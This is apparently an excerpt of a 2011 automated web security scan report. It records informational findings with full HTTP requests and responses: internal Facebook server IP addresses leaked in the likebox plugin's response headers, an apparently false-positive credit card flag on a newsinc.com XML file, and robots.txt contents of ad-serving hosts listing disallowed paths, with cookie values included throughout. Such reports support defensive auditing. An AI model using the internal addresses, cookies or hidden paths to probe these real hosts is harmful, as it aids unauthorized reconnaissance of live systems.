Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.105.118
X-Cnection: close
Date: Sat, 17 Sep 2011 17:12:45 GMT
Content-Length: 13423

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.119. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=112965278727107&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27409829c%26origin%3Dhttp%253A%252F%252Fwww.seventeen.com%252Ff176a6a3d8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fseventeenmagazine&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.127.41
X-Cnection: close
Date: Sat, 17 Sep 2011 16:25:43 GMT
Content-Length: 12405

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.120. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.51.199
X-Cnection: close
Date: Sat, 17 Sep 2011 17:23:35 GMT
Content-Length: 13405

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.121. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.51
X-Cnection: close
Date: Sat, 17 Sep 2011 17:07:21 GMT
Content-Length: 13396

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.122. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.68.56
X-Cnection: close
Date: Sat, 17 Sep 2011 16:57:08 GMT
Content-Length: 13350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.123. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:49:55 GMT
Content-Length: 13384

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.124. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.40.62
X-Cnection: close
Date: Sat, 17 Sep 2011 16:36:56 GMT
Content-Length: 13437

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.125. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.233.34
X-Cnection: close
Date: Sat, 17 Sep 2011 16:31:24 GMT
Content-Length: 13378

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.126. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=181790778546301&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a42cadd4%26origin%3Dhttp%253A%252F%252Fwww.thedailygreen.com%252Ff29d10b224%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fthedailygreen&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.227.37
X-Cnection: close
Date: Sat, 17 Sep 2011 16:28:06 GMT
Content-Length: 12531

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.127. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.46
X-Cnection: close
Date: Sat, 17 Sep 2011 16:29:58 GMT
Content-Length: 13358

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.128. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=184150621627178&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df435cdcb4%26origin%3Dhttp%253A%252F%252Fwww.delish.com%252Ff51e4653%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=257&href=http%3A%2F%2Fwww.facebook.com%2Fdelish&locale=en_US&sdk=joey&show_faces=true&stream=false&width=310 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.235.67
X-Cnection: close
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 13304

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
22.129. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?api_key=113869198637480&connections=10&header=false&id=44296099908&locale=en_US&sdk=joey&stream=false&width=300&height=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.170.124
X-Cnection: close
Date: Sat, 17 Sep 2011 17:18:08 GMT
Content-Length: 13366

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
23. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /flash/widget_toppicks01ps2.xml

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /flash/widget_toppicks01ps2.xml?v=2.7.0 HTTP/1.1
Host: assets.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503
If-None-Match: "d4fc97c509659b75278236329237887d"
If-Modified-Since: Fri, 20 May 2011 20:02:04 GMT

Response

HTTP/1.1 200 OK
x-amz-id-2: AIEH5niEB+Q2tQSCdTYEY+Hz+zuoGTEXR33/Oj4xb+wMhcEWaG3vtMMQ2B0i2Zvy
x-amz-request-id: 464780F321832A41
Date: Sat, 17 Sep 2011 16:23:19 GMT
Cache-Control: max-age=0
Last-Modified: Fri, 20 May 2011 20:02:04 GMT
ETag: "d4fc97c509659b75278236329237887d"
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 6957
Server: AmazonS3

<?xml version="1.0"?>
<gui_info>
   <resources>
       <guifile file="widget_hothmb_gui01.swf"/>
       <cssfile file="internal">
           <!--file="internal" & add internalcss element and insert CDATA css-->
           <inter
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
<geom:Point x="0.6585942936673626" y="0.39778761061946905"/>
...[SNIP]...
24. Robots.txt file  previous  next
There are 138 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://1663.ic-live.com/goat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1663.ic-live.com
Path:   /goat.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1663.ic-live.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:37:24 GMT
Server: Apache
Last-Modified: Thu, 11 Aug 2011 17:50:31 GMT
ETag: "380405-72f-4aa3e6ed527c0"
Accept-Ranges: bytes
Content-Length: 1839
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Cache: MISS from i2a-coll-2
X-Cache-Lookup: MISS from i2a-coll-2:80
Via: 1.0 i2a-coll-2:80 (squid/2.6.STABLE21)
Connection: close

...User-agent: *
Disallow: /allCountryCodes.txt
Disallow: /altidconv.php
Disallow: /backup/
Disallow: /bugs-dec16.tar
Disallow: /cgi-bin/
Disallow: /checktime.php
Disallow: /client-kit/
Disallow: /com
...[SNIP]...
24.2. http://33across.com/api/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://33across.com
Path:   /api/opt-out.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:44:37 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:26 GMT
Accept-Ranges: bytes
Content-Length: 192
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sat, 01 Oct 2011 16:44:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /api/
Disallow: /app/
Disallow: /css/
Disallow: /dpp/
Disallow: /img/
Disallow: /js/
Disallow: /optout/
Disallow: /php/
Disallow: /ps/
Disallow: /swf/
Disallow: /test/
24.3. http://a.netmng.com/opt-status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:43:58 GMT
Server: Apache/2.2.9
Last-Modified: Thu, 23 Dec 2010 17:36:37 GMT
ETag: "fc6f7-1a-498174fc7b340"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
24.4. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 22 Jul 2011 17:49:40 GMT
Accept-Ranges: bytes
ETag: "012e9ba9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:57 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /
24.5. http://a.rfihub.com/nai_check_status.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_check_status.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 26

User-agent: *
Disallow: /
24.6. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
24.7. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:38:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Mon, 19 Sep 2011 16:38:26 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
24.8. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.auditude.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 25 Jul 2011 17:10:02 GMT
Content-Length: 27
Date: Sat, 17 Sep 2011 16:23:18 GMT
Server: lighttpd/1.4.18


User-agent: *
Disallow: /
24.9. http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sat, 17 Sep 2011 16:23:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
24.10. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sat, 17 Sep 2011 16:37:00 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
24.11. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 16:24:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 16:24:38 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

